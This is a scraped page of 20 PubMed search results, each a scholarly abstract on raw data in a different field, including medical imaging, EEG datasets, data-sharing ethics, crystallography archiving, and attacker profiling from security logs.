Your browser doesn't support javascript.
loading
Show: 20 | 50 | 100
Results 1 - 20 de 92
Filter
1.
Data Brief ; 54: 110451, 2024 Jun.
Article in English | MEDLINE | ID: mdl-38962195

ABSTRACT

The Oxford COVID-19 Vaccine Hesitancy Scale is a 7-item psychometric scale developed by Freeman and colleagues a year after detecting the first case of the disease in 2019. The scale assesses people's thoughts, feelings, and behavior toward COVID-19 vaccines. A comprehensive search of major electronic databases, including Scopus, Clarivate Analytics, and PubMed, was conducted to extract eligible articles for inclusion in this meta-analysis. This paper reports information on data collected for a reliability generalization meta-analysis of the Oxford COVID-19 Vaccine Hesitancy Scale. The dataset incorporates information on the average reliability of the scale as measured with Cronbach's alpha in 20 studies included in the meta-analysis. Several benefits can be derived from the dataset. In particular, the research community would find this dataset beneficial as it can enhance their understanding of the health challenges of COVID-19, helping them come up with better solutions to eradicate the disease.

2.
Front Neuroimaging ; 3: 1336887, 2024.
Article in English | MEDLINE | ID: mdl-38984197

ABSTRACT

Introduction: Use of functional MRI in awake non-human primate (NHPs) has recently increased. Scanning animals while awake makes data collection possible in the absence of anesthetic modulation and with an extended range of possible experimental designs. Robust awake NHP imaging however is challenging due to the strong artifacts caused by time-varying off-resonance changes introduced by the animal's body motion. In this study, we sought to thoroughly investigate the effect of a newly proposed dynamic off-resonance correction method on brain activation estimates using extended awake NHP data. Methods: We correct for dynamic B0 changes in reconstruction of highly accelerated simultaneous multi-slice EPI acquisitions by estimating and correcting for dynamic field perturbations. Functional MRI data were collected in four male rhesus monkeys performing a decision-making task in the scanner, and analyses of improvements in sensitivity and reliability were performed compared to conventional image reconstruction. Results: Applying the correction resulted in reduced bias and improved temporal stability in the reconstructed time-series data. We found increased sensitivity to functional activation at the individual and group levels, as well as improved reliability of statistical parameter estimates. Conclusions: Our results show significant improvements in image fidelity using our proposed correction strategy, as well as greatly enhanced and more reliable activation estimates in GLM analyses.

3.
Polymers (Basel) ; 16(13)2024 Jun 28.
Article in English | MEDLINE | ID: mdl-39000705

ABSTRACT

Up to the 1930s, the Italian pictorialism movement dominated photography, and many handcrafted procedures started appearing. Each operator had his own working method and his own secrets to create special effects that moved away from the standard processes. Here, a methodology that combines X-ray fluorescence and infrared analysis spectroscopy with unsupervised learning techniques was developed on an unconventional Italian photographic print collection (the Piero Vanni Collection, 1889-1939) to unveil the artistic technique by the extraction of spectroscopic benchmarks. The methodology allowed the distinction of hidden elements, such as iodine and manganese in silver halide printing, or highlighted slight differences in the same printing technique and unveiled the stylistic practice. Spectroscopic benchmarks were extracted to identify the elemental and molecular fingerprint layers, as the oil-based prints were obscured by the proteinaceous binder. It was identified that the pigments used were silicates or iron oxide introduced into the solution or that they retraced the practice of reusing materials to produce completely different printing techniques. In general, four main groups were extracted, in this way recreating the 'artistic palette' of the unconventional photography of the artist. The four groups were the following: (1) Cr, Fe, K, potassium dichromate, and gum arabic bands characterized the dichromate salts; (2) Ag, Ba, Sr, Mn, Fe, S, Ba, gelatin, and albumen characterized the silver halide emulsions on the baryta layer; (3) the carbon prints were benchmarked by K, Cr, dichromate salts, and pigmented gelatin; and (4) the heterogeneous class of bromoil prints was characterized by Ba, Fe, Cr, Ca, K, Ag, Si, dichromate salts, and iron-based pigments. Some exceptions were found, such as the baryta layer being divided into gum bichromate groups or the use of albumen in silver particles suspended in gelatin, to underline the unconventional photography at the end of the 10th century.

4.
IUCrJ ; 11(Pt 4): 464-475, 2024 Jul 01.
Article in English | MEDLINE | ID: mdl-38864497

ABSTRACT

The hardware for data archiving has expanded capacities for digital storage enormously in the past decade or more. The IUCr evaluated the costs and benefits of this within an official working group which advised that raw data archiving would allow ground truth reproducibility in published studies. Consultations of the IUCr's Commissions ensued via a newly constituted standing advisory committee, the Committee on Data. At all stages, the IUCr financed workshops to facilitate community discussions and possible methods of raw data archiving implementation. The recent launch of the IUCrData journal's Raw Data Letters is a milestone in the implementation of raw data archiving beyond the currently published studies: it includes diffraction patterns that have not been fully interpreted, if at all. The IUCr 75th Congress in Melbourne included a workshop on raw data reuse, discussing the successes and ongoing challenges of raw data reuse. This article charts the efforts of the IUCr to facilitate discussions and plans relating to raw data archiving and reuse within the various communities of crystallography, diffraction and scattering.

5.
Phys Imaging Radiat Oncol ; 30: 100584, 2024 Apr.
Article in English | MEDLINE | ID: mdl-38803466

ABSTRACT

Background and purpose: Even with most breathing-controlled four-dimensional computed tomography (4DCT) algorithms image artifacts caused by single significant longer breathing still occur, resulting in negative consequences for radiotherapy. Our study presents first phantom examinations of a new optimized raw data selection and binning algorithm, aiming to improve image quality and geometric accuracy without additional dose exposure. Materials and methods: To validate the new approach, phantom measurements were performed to assess geometric accuracy (volume fidelity, root mean square error, Dice coefficient of volume overlap) for one- and three-dimensional tumor motion trajectories with and without considering motion hysteresis effects. Scans without significantly longer breathing cycles served as references. Results: Median volume deviations between optimized approach and reference of at maximum 1% were obtained considering all movements. In comparison, standard reconstruction yielded median deviations of 9%, 21% and 12% for one-dimensional, three-dimensional, and hysteresis motion, respectively. Measurements in one- and three-dimensional directions reached a median Dice coefficient of 0.970 ± 0.013 and 0.975 ± 0.012, respectively, but only 0.918 ± 0.075 for hysteresis motions averaged over all measurements for the optimized selection. However, for the standard reconstruction median Dice coefficients were 0.845 ± 0.200, 0.868 ± 0.205 and 0.915 ± 0.075 for one- and three-dimensional as well as hysteresis motions, respectively. Median root mean square errors for the optimized algorithm were 30 ± 16 HU2 and 120 ± 90 HU2 for three-dimensional and hysteresis motions, compared to 212 ± 145 HU2 and 130 ± 131 HU2 for the standard reconstruction. Conclusions: The algorithm was proven to reduce 4DCT-related artifacts due to missing projection data without further dose exposure. An improvement in radiotherapy treatment planning due to better image quality can be expected.

6.
Sci Rep ; 14(1): 9358, 2024 04 23.
Article in English | MEDLINE | ID: mdl-38653758

ABSTRACT

The goal of this experimental study was to quantify the influence of helical pitch and gantry rotation time on image quality and file size in ultrahigh-resolution photon-counting CT (UHR-PCCT). Cervical and lumbar spine, pelvis, and upper legs of two fresh-frozen cadaveric specimens were subjected to nine dose-matched UHR-PCCT scan protocols employing a collimation of 120 × 0.2 mm with varying pitch (0.3/1.0/1.2) and rotation time (0.25/0.5/1.0 s). Image quality was analyzed independently by five radiologists and further substantiated by placing normed regions of interest to record mean signal attenuation and noise. Effective mAs, CT dose index (CTDIvol), size-specific dose estimate (SSDE), scan duration, and raw data file size were compared. Regardless of anatomical region, no significant difference was ascertained for CTDIvol (p ≥ 0.204) and SSDE (p ≥ 0.240) among protocols. While exam duration differed substantially (all p ≤ 0.016), the lowest scan time was recorded for high-pitch protocols (4.3 ± 1.0 s) and the highest for low-pitch protocols (43.6 ± 15.4 s). The combination of high helical pitch and short gantry rotation times produced the lowest perceived image quality (intraclass correlation coefficient 0.866; 95% confidence interval 0.807-0.910; p < 0.001) and highest noise. Raw data size increased with acquisition time (15.4 ± 5.0 to 235.0 ± 83.5 GByte; p ≤ 0.013). Rotation time and pitch factor have considerable influence on image quality in UHR-PCCT and must therefore be chosen deliberately for different musculoskeletal imaging tasks. In examinations with long acquisition times, raw data size increases considerably, consequently limiting clinical applicability for larger scan volumes.


Subject(s)
Photons , Humans , Tomography, X-Ray Computed/methods , Cadaver , Rotation , Radiation Dosage , Tomography, Spiral Computed/methods
7.
Int J Cardiol ; 405: 131987, 2024 Jun 15.
Article in English | MEDLINE | ID: mdl-38513735

ABSTRACT

BACKGROUND: The rising concern of irreproducible and non-transparent studies poses a significant challenge in modern medical literature. The impact of this issue on cardiology, particularly in the subfield of heart failure, remains poorly understood. To address this knowledge gap, we assessed the quality of evidence presented in recent heart failure meta-analyses by exploring several crucial transparency indicators. METHODS: We conducted a cross-sectional study and searched PubMed for meta - analyses themed around heart failure. We included the 100 most recent publications from 2021 and investigated the presence of several indices that are associated with transparency and reproducibility. RESULTS: The vast majority of the papers did not include their raw data (95/100, 95%) nor their analytic code (99/100, 99%). Less than half (42/100, 42%) preregistered their protocol, while only 65/100 (65%) adhered to a reporting guidelines method. Bias calculation for the respective studies included in each meta - analysis was present in 83/100 (83%) papers and publication bias was measured in approximately half (56/100, 56%). CONCLUSIONS: Our study indicates that meta-analyses in the field of heart failure present important information of transparency infrequently. Therefore, reproduction and validation of their findings seems to be practically impossible.


Subject(s)
Heart Failure , Meta-Analysis as Topic , PubMed , Humans , Cross-Sectional Studies , PubMed/statistics & numerical data , Disclosure , Reproducibility of Results
8.
Physiol Rev ; 104(3): 1387-1408, 2024 Jul 01.
Article in English | MEDLINE | ID: mdl-38451234

ABSTRACT

Effective data management is crucial for scientific integrity and reproducibility, a cornerstone of scientific progress. Well-organized and well-documented data enable validation and building on results. Data management encompasses activities including organization, documentation, storage, sharing, and preservation. Robust data management establishes credibility, fostering trust within the scientific community and benefiting researchers' careers. In experimental biomedicine, comprehensive data management is vital due to the typically intricate protocols, extensive metadata, and large datasets. Low-throughput experiments, in particular, require careful management to address variations and errors in protocols and raw data quality. Transparent and accountable research practices rely on accurate documentation of procedures, data collection, and analysis methods. Proper data management ensures long-term preservation and accessibility of valuable datasets. Well-managed data can be revisited, contributing to cumulative knowledge and potential new discoveries. Publicly funded research has an added responsibility for transparency, resource allocation, and avoiding redundancy. Meeting funding agency expectations increasingly requires rigorous methodologies, adherence to standards, comprehensive documentation, and widespread sharing of data, code, and other auxiliary resources. This review provides critical insights into raw and processed data, metadata, high-throughput versus low-throughput datasets, a common language for documentation, experimental and reporting guidelines, efficient data management systems, sharing practices, and relevant repositories. We systematically present available resources and optimal practices for wide use by experimental biomedical researchers.


Subject(s)
Biomedical Research , Data Management , Information Dissemination , Biomedical Research/standards , Biomedical Research/methods , Information Dissemination/methods , Humans , Animals , Data Management/methods
9.
Data Brief ; 53: 110148, 2024 Apr.
Article in English | MEDLINE | ID: mdl-38384310

ABSTRACT

The miniaturisation and decrease of price are amongst the main current trends in the area of Global Navigation Satellite Systems (GNSS) receivers. Besides standalone receivers also receivers incorporated into Android devices can provide raw GNSS measurements thus enabling much wider options, formerly restricted to devices of much higher price. The article describes two datasets. The first was collected using a Xiaomi Mi 8 smartphone with and without application of a simple ground plane. In the second we compared a smartphone receiver (Google Pixel 5) with a standalone low-cost receiver (u-Blox ZED F9P). In both cases the datasets consist of multiple measurement sessions, also considering the conditions where the reception of GNSS signals was obstructed by trees' canopy. The datasets are focused on repeatability (multiple measurements), influence of external conditions (canopy and foliage state) and the devices used.

10.
J Health Psychol ; 29(7): 653-658, 2024 Jun.
Article in English | MEDLINE | ID: mdl-38282356

ABSTRACT

Many journals are moving towards a 'Mandatory Inclusion of Raw Data' (MIRD) model of data sharing, where it is expected that raw data be publicly accessible at article submission. While open data sharing is beneficial for some research topics and methodologies within health psychology, in other cases it may be ethically and epistemologically questionable. Here, we outline several questions that qualitative researchers might consider surrounding the ethics of open data sharing. Overall, we argue that universal open raw data mandates cannot adequately represent the diversity of qualitative research, and that MIRD may harm rigorous and ethical research practice within health psychology and beyond. Researchers should instead find ways to demonstrate rigour thorough engagement with questions surrounding data sharing. We propose that all researchers utilise the increasingly common 'data availability statement' to demonstrate reflexive engagement with issues of ethics, epistemology and participant protection when considering whether to open data.


Subject(s)
Information Dissemination , Qualitative Research , Humans , Information Dissemination/ethics
11.
Phys Med Biol ; 69(7)2024 Mar 18.
Article in English | MEDLINE | ID: mdl-38224617

ABSTRACT

Objective.In the realm of utilizing artificial intelligence (AI) for medical image analysis, the paradigm of 'signal-image-knowledge' has remained unchanged. However, the process of 'signal to image' inevitably introduces information distortion, ultimately leading to irrecoverable biases in the 'image to knowledge' process. Our goal is to skip reconstruction and build a diagnostic model directly from the raw data (signal).Approach. This study focuses on computed tomography (CT) and its raw data (sinogram) as the research subjects. We simulate the real-world process of 'human-signal-image' using the workflow 'CT-simulated data- reconstructed CT,' and we develop a novel AI predictive model directly targeting raw data (RCTM). This model comprises orientation, spatial, and global analysis modules, embodying the fusion of local to global information extraction from raw data. We selected 1994 patients with retrospective cases of solid lung nodules and modeled different types of data.Main results. We employed predefined radiomic features to assess the diagnostic feature differences caused by reconstruction. The results indicated that approximately 14% of the features had Spearman correlation coefficients below 0.8. These findings suggest that despite the increasing maturity of CT reconstruction algorithms, they still introduce perturbations to diagnostic features. Moreover, our proposed RCTM achieved an area under the curve (AUC) of 0.863 in the diagnosis task, showcasing a comprehensive superiority over models constructed from secondary reconstructed CTs (0.840, 0.822, and 0.825). Additionally, the performance of RCTM closely resembled that of models constructed from original CT scans (0.868, 0.878, and 0.866).Significance. The diagnostic and therapeutic approach directly based on CT raw data can enhance the precision of AI models and the concept of 'signal-to-image' can be extended to other types of imaging. AI diagnostic models tailored to raw data offer the potential to disrupt the traditional paradigm of 'signal-image-knowledge', opening up new avenues for more accurate medical diagnostics.


Subject(s)
Artificial Intelligence , Radiology , Humans , Retrospective Studies , Tomography, X-Ray Computed/methods , Algorithms , Image Processing, Computer-Assisted/methods
12.
Acta Crystallogr F Struct Biol Commun ; 79(Pt 10): 267-273, 2023 Oct 01.
Article in English | MEDLINE | ID: mdl-37815476

ABSTRACT

A recent editorial in the IUCr macromolecular crystallography journals [Helliwell et al. (2019), Acta Cryst. D75, 455-457] called for the implementation of the FAIR data principles. This implies that the authors of a paper that describes research on a macromolecular structure should make their raw diffraction data available. Authors are already used to submitting the derived data (coordinates) and the processed data (structure factors, merged or unmerged) to the PDB, but may still be uncomfortable with making the raw diffraction images available. In this paper, some guidelines and instructions on depositing raw data to Zenodo are given.


Subject(s)
Crystallography , Crystallography, X-Ray , Macromolecular Substances
13.
Appl Neuropsychol Adult ; : 1-20, 2023 Aug 13.
Article in English | MEDLINE | ID: mdl-37573544

ABSTRACT

In the practice of psychological assessment there have been warnings for decades by the American Psychological Association (APA), the National Academy of Neuropsychology (NAN), other associations, and test vendors, against the disclosure of test raw data and test materials. Psychological assessment occurs across several different practice environments, and test raw data is a particularly sensitive aspect of practice considering what it implicitly represents about a client/patient, and this concept is further developed in this paper. Many times, test materials are intellectual property protected by copyrights and user agreements. It follows that improper management of the release of test raw data and test materials threatens the scientific integrity of psychological assessment. Here the matters of test raw data, test materials, and different practice environments are addressed to highlight the challenges involved with improper releases and to offer guidance concerning good-faith efforts to preserve the integrity of psychological assessment and legal agreements. The unique demands of forensic practice are also discussed, including attorneys' needs for cross-examination and discovery, which may place psychologists (and other duly vetted evaluators) in conflict with their commitment to professional ethical codes and legal agreements. To this end, important threats to the proper use of test raw data and test materials include uninformed professionals and compromised evaluators. In this paper, the mishandling of test raw data and materials by both psychologists and other evaluators is reviewed, representative case examples, including those from the literature, are provided, pertinent case law is discussed, and practical stepwise conflict resolutions are offered.

14.
Front Bioinform ; 3: 1143014, 2023.
Article in English | MEDLINE | ID: mdl-37063647

ABSTRACT

Making raw data available to the research community is one of the pillars of Findability, Accessibility, Interoperability, and Reuse (FAIR) research. However, the submission of raw data to public databases still involves many manually operated procedures that are intrinsically time-consuming and error-prone, which raises potential reliability issues for both the data themselves and the ensuing metadata. For example, submitting sequencing data to the European Genome-phenome Archive (EGA) is estimated to take 1 month overall, and mainly relies on a web interface for metadata management that requires manual completion of forms and the upload of several comma separated values (CSV) files, which are not structured from a formal point of view. To tackle these limitations, here we present EGAsubmitter, a Snakemake-based pipeline that guides the user across all the submission steps, ranging from files encryption and upload, to metadata submission. EGASubmitter is expected to streamline the automated submission of sequencing data to EGA, minimizing user errors and ensuring higher end product fidelity.

15.
Data Brief ; 48: 109060, 2023 Jun.
Article in English | MEDLINE | ID: mdl-37006396

ABSTRACT

Thirty-six chronic neuropathic pain patients (8 men and 28 women) of Mexican nationality with a mean age of 44±13.98 were recruited for EEG signal recording in eyes open and eyes closed resting state condition. Each condition was recorded for 5 min, with a total recording session time of 10 min. An ID number was given to each patient after signing up for the study, with which they answered the painDETECT questionnaire as a screening process for neuropathic pain alongside their clinical history. The day of the recording, the patients answered the Brief Pain Inventory, as an evaluation questionnaire for the interference of the pain with their daily life. Twenty-two EEG channels positioned in accordance with the 10/20 international system were registered with Smarting mBrain device. EEG signals were sampled at 250 Hz with a bandwidth between 0.1 and 100 Hz. The article provides two types of data: (1) raw EEG data in resting state and (2) the report of patients for two validated pain questionnaires. The data described in this article can be used for classifier algorithms considering stratifying chronic neuropathic pain patients with EEG data alongside their pain scores. In sum, this data is of extreme relevance for the pain field, where researchers have been seeking to integrate the pain experience with objective physiological data, such as the EEG.

16.
Int J Behav Nutr Phys Act ; 20(1): 35, 2023 03 25.
Article in English | MEDLINE | ID: mdl-36964597

ABSTRACT

BACKGROUND: Over the last decade use of raw acceleration metrics to assess physical activity has increased. Metrics such as Euclidean Norm Minus One (ENMO), and Mean Amplitude Deviation (MAD) can be used to generate metrics which describe physical activity volume (average acceleration), intensity distribution (intensity gradient), and intensity of the most active periods (MX metrics) of the day. Presently, relatively little comparative data for these metrics exists in youth. To address this need, this study presents age- and sex-specific reference percentile values in England youth and compares physical activity volume and intensity profiles by age and sex. METHODS: Wrist-worn accelerometer data from 10 studies involving youth aged 5 to 15 y were pooled. Weekday and weekend waking hours were first calculated for youth in school Years (Y) 1&2, Y4&5, Y6&7, and Y8&9 to determine waking hours durations by age-groups and day types. A valid waking hours day was defined as accelerometer wear for ≥ 600 min·d-1 and participants with ≥ 3 valid weekdays and ≥ 1 valid weekend day were included. Mean ENMO- and MAD-generated average acceleration, intensity gradient, and MX metrics were calculated and summarised as weighted week averages. Sex-specific smoothed percentile curves were generated for each metric using Generalized Additive Models for Location Scale and Shape. Linear mixed models examined age and sex differences. RESULTS: The analytical sample included 1250 participants. Physical activity peaked between ages 6.5-10.5 y, depending on metric. For all metrics the highest activity levels occurred in less active participants (3rd-50th percentile) and girls, 0.5 to 1.5 y earlier than more active peers, and boys, respectively. Irrespective of metric, boys were more active than girls (p < .001) and physical activity was lowest in the Y8&9 group, particularly when compared to the Y1&2 group (p < .001). CONCLUSIONS: Percentile reference values for average acceleration, intensity gradient, and MX metrics have utility in describing age- and sex-specific values for physical activity volume and intensity in youth. There is a need to generate nationally-representative wrist-acceleration population-referenced norms for these metrics to further facilitate health-related physical activity research and promotion.


Subject(s)
Accelerometry , Wrist , Humans , Male , Adolescent , Female , Child , Reference Values , Benchmarking , Exercise , England
17.
Brain Sci ; 13(2)2023 Jan 31.
Article in English | MEDLINE | ID: mdl-36831784

ABSTRACT

EEG signals are interpreted, analyzed and classified by many researchers for use in brain-computer interfaces. Although there are many different EEG signal acquisition methods, one of the most interesting is motor imagery signals. Many different signal processing methods, machine learning and deep learning models have been developed for the classification of motor imagery signals. Among these, Convolutional Neural Network models generally achieve better results than other models. Because the size and shape of the data is important for training Convolutional Neural Network models and discovering the right relationships, researchers have designed and experimented with many different input shape structures. However, no study has been found in the literature evaluating the effect of different input shapes on model performance and accuracy. In this study, the effects of different input shapes on model performance and accuracy in the classification of EEG motor imagery signals were investigated, which had not been specifically studied before. In addition, signal preprocessing methods, which take a long time before classification, were not used; rather, two CNN models were developed for training and classification using raw data. Two different datasets, BCI Competition IV 2A and 2B, were used in classification processes. For different input shapes, 53.03-89.29% classification accuracy and 2-23 s epoch time were obtained for 2A dataset, 64.84-84.94% classification accuracy and 4-10 s epoch time were obtained for 2B dataset. This study showed that the input shape has a significant effect on the classification performance, and when the correct input shape is selected and the correct CNN architecture is developed, feature extraction and classification can be done well by the CNN architecture without any signal preprocessing.

18.
Sensors (Basel) ; 23(4)2023 Feb 10.
Article in English | MEDLINE | ID: mdl-36850628

ABSTRACT

The notion of the attacker profile is often used in risk analysis tasks such as cyber attack forecasting, security incident investigations and security decision support. The attacker profile is a set of attributes characterising an attacker and their behaviour. This paper analyzes the research in the area of attacker modelling and presents the analysis results as a classification of attacker models, attributes and risk analysis techniques that are used to construct the attacker models. The authors introduce a formal two-level attacker model that consists of high-level attributes calculated using low-level attributes that are in turn calculated on the basis of the raw security data. To specify the low-level attributes, the authors performed a series of experiments with datasets of attacks. Firstly, the requirements of the datasets for the experiments were specified in order to select the appropriate datasets, and, afterwards, the applicability of the attributes formed on the basis of such nominal parameters as bash commands and event logs to calculate high-level attributes was evaluated. The results allow us to conclude that attack team profiles can be differentiated using nominal parameters such as bash history logs. At the same time, accurate attacker profiling requires the extension of the low-level attributes list.

19.
Financ Innov ; 9(1): 39, 2023.
Article in English | MEDLINE | ID: mdl-36687790

ABSTRACT

Full electronic automation in stock exchanges has recently become popular, generating high-frequency intraday data and motivating the development of near real-time price forecasting methods. Machine learning algorithms are widely applied to mid-price stock predictions. Processing raw data as inputs for prediction models (e.g., data thinning and feature engineering) can primarily affect the performance of the prediction methods. However, researchers rarely discuss this topic. This motivated us to propose three novel modelling strategies for processing raw data. We illustrate how our novel modelling strategies improve forecasting performance by analyzing high-frequency data of the Dow Jones 30 component stocks. In these experiments, our strategies often lead to statistically significant improvement in predictions. The three strategies improve the F1 scores of the SVM models by 0.056, 0.087, and 0.016, respectively. Supplementary Information: The online version contains supplementary material available at 10.1186/s40854-022-00431-9.

20.
IUCrdata ; 7(Pt 9): x220852, 2022 Sep.
Article in English | MEDLINE | ID: mdl-36452441

ABSTRACT

Remarkable features are reported in the diffraction pattern produced by a crystal of the second extracellular domain of tetraspanin CD9 (deemed CD9EC2), the structure of which has been described previously [Oosterheert et al. (2020 ▸), Life Sci. Alliance, 3, e202000883]. CD9EC2 crystallized in space group P1 and was twinned. Two types of diffuse streaks are observed. The stronger diffuse streaks are related to the twinning and occur in the direction perpendicular to the twinning interface. It is concluded that the twin domains scatter coherently as both Bragg reflections and diffuse streaks are seen. The weaker streaks along c* are unrelated to the twinning but are caused by intermittent layers of non-crystallographic symmetry related molecules. It is envisaged that the raw diffraction images could be very useful for methods developers trying to remove the diffuse scattering to extract accurate Bragg intensities or using it to model the effect of packing disorder on the molecular structure.

SELECTION OF CITATIONS
SEARCH DETAIL
...